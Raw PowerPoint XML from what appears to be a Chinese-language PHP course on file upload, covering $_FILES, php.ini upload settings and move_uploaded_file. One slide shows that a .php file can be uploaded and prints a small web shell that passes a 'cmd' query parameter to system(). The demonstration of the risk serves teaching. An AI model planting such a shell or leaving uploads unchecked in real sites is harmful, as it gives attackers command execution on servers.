          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　線上投票系統</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　購物車</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　網路相簿</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>PART 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　附錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>PDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>電子書，收錄於書附光碟）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　附錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>語法教學</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　附錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>標籤與屬性速查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　附錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>特殊字元表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5570185" y="1806731"/>
            <a:ext cx="3480499" cy="1562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i="1" dirty="0" smtClean="0"/>
              <a:t>16-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>認識檔案上傳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>16-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>上傳單一檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>16-3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>上傳多個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 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05019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-1" y="229029"/>
            <a:ext cx="9086335" cy="73818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zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF0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76996" y="1100696"/>
            <a:ext cx="8455111" cy="662201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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>瀏覽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>者只要按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>選擇檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，就可以透過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開啟舊檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>對話方塊選擇要上傳的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖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4073223" y="2158825"/>
            <a:ext cx="4658884" cy="396188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00" y="1896376"/>
            <a:ext cx="3701521" cy="49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0" y="344359"/>
            <a:ext cx="9086335" cy="7381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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/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33" y="4040933"/>
            <a:ext cx="4030226" cy="214300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33" y="1504598"/>
            <a:ext cx="3982643" cy="2114284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="向下箭號 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598140" y="3211109"/>
            <a:ext cx="881449" cy="81554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794" y="1448739"/>
            <a:ext cx="4114449" cy="217014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980" y="4081182"/>
            <a:ext cx="4121152" cy="2170143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>
            <a:off x="6417625" y="3442259"/>
            <a:ext cx="881449" cy="81554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67995" y="533674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無法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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44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12" y="1757142"/>
            <a:ext cx="7757047" cy="4124674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0" y="444843"/>
            <a:ext cx="9144000" cy="97545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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a: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測試看看是否不同檔案類型都可以上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXX.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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188090"/>
            <a:ext cx="7886700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/>
              <a:t>&lt;form action="" method="get"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command: &lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" /&gt;&lt;input type="submit" value="submit" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Output:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>']))    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/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444843"/>
            <a:ext cx="9144000" cy="97545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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a: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測試看看是否不同檔案類型都可以上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXX.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="28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4985" y="1573361"/>
            <a:ext cx="4030912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  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>那</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上傳一隻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webshell.php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10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" y="1574217"/>
            <a:ext cx="8770977" cy="4933675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0" y="444843"/>
            <a:ext cx="9144000" cy="97545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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload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28740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4748" r="40991" b="26300"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112437" y="2641236"/>
            <a:ext cx="9031563" cy="3695356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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475720" y="1733069"/>
            <a:ext cx="3770356" cy="1816335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TW" dirty="0" smtClean="0"/>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>組態設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>檔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>下列參數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 file_uploads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 upload_tmp_dir</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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 upload_max_filesize</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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 post_max_size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>max_input_time</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/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535460"/>
            <a:ext cx="9144000" cy="97545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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>組態設定檔</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112437" y="1554182"/>
            <a:ext cx="2576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D:\AppServ\php7\php.ini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737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</TotalTime>
  <Words>1132</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>191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SimSun</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>php程式設計_檔案上傳</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>檔案上傳FileUpload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PHP的Superglobals變數::$_FILES http://php.net/manual/en/language.variables.superglobals.php</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>http://php.net/manual/en/function.move-uploaded-file.php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ksu</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-20T11:14:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-05T17:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>